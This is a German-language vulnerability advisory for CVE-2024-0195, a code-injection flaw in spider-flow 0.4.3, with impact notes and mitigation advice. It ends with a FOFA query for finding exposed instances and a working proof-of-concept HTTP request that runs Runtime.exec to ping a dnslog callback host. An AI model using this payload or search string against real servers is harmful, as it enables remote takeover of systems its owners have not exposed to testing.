
CVE-2024-0195 ist eine kritische Code-Injection-Schwachstelle in der Webanwendung spider-flow 0.4.3, und zwar in der Funktion FunctionService.saveFunction der Datei FunctionController.java. Ein Angreifer kann aus der Ferne schädlichen Code einschleusen, der auf dem Server ausgeführt wird. Dadurch kann die Anwendung vollständig kompromittiert werden.
Diese Schwachstelle ist äußerst schwerwiegend, da sie eine Remote-Codeausführung auf dem Server ermöglicht, der die verwundbare spider-flow-Anwendung hostet. Ein Angreifer könnte den Server vollständig kompromittieren, sensible Daten stehlen, Malware oder Krypto-Miner installieren und ihn für weitere Angriffe innerhalb des Netzwerks nutzen. Die Vertraulichkeit, Integrität und Verfügbarkeit der Anwendung und des Servers sind alle kritisch beeinträchtigt.
Eine gepatchte Version wird nicht explizit erwähnt, sodass ein Patchen derzeit offenbar keine Option zu sein scheint. Die Schwachstelle wurde öffentlich offengelegt und Exploits sind verfügbar, daher sind sofortige Gegenmaßnahmen von entscheidender Bedeutung.
Bis ein offizieller Patch veröffentlicht wird, sollte spider-flow 0.4.3 sofort offline genommen oder der Zugriff nur auf vertrauenswürdige Netzwerke/Benutzer beschränkt werden. Web Application Firewalls oder andere Eingabevalidierungsmechanismen könnten möglicherweise so konfiguriert werden, dass sie versuchte Code-Injection-Angriffe als Übergangsmaßnahme erkennen und blockieren. Diese sind jedoch keine vollständigen Lösungen, und die verwundbare Version sollte aktualisiert werden, sobald eine behobene Version verfügbar ist.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ Proof of Concept
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B